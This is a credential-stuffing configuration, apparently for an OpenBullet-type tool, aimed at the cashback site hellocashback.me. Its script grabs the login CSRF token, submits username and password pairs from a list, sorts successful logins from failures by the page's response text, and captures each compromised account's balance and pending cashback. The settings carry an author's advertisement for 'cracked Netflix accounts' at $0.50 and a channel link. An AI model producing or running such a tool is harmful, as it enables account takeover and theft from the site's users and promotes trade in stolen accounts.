[SETTINGS]
{
  "Name": "HelloCashback.Me {CASHBACK}",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-10-05T13:40:09.7803897-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@MasterLordConfigs",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "IF YOU WANT BUY CRACKED NETFLIX ACCOUNTS BY 0.50$ > @MasterLord007",
      "VariableName": "",
      "Id": 797507010
    },
    {
      "Description": "JOIN > @MasterLordConfigs",
      "VariableName": "",
      "Id": 1227214836
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "HelloCashback",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GET_CSRF REQUEST GET "https://hellocashback.me/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CSRF PARSE "<SOURCE>" LR "YII_CSRF_TOKEN':'" "'" -> VAR "csrf" 

#LOGIN REQUEST POST "https://hellocashback.me/login" 
  CONTENT "YII_CSRF_TOKEN=<csrf>&LoginForm%5Blogin%5D=<USER>&LoginForm%5Bpassword%5D=&LoginForm%5Bpassword%5D=<PASS>&yt0=Sign+in+to+HelloCashback" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38" 
  HEADER "cache-control: max-age=0" 
  HEADER "accept-encoding: gzip, deflate, br" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or password" 
    KEY "Email (Login) cannot be blank." 
    KEY "Password cannot be blank." 
  KEYCHAIN Success OR 
    KEY "Pending" 

#BALANCE PARSE "<SOURCE>" LR "<span class=\"miles miles--text\">" "</span>" CreateEmpty=FALSE -> CAP "Balance" 

#PENDING PARSE "<SOURCE>" LR "<span class=\"miles--text\">" "</span>" CreateEmpty=FALSE -> CAP "Pending" 

#CREATOR FUNCTION Constant "@MasterLordConfigs" -> CAP "Config By" 

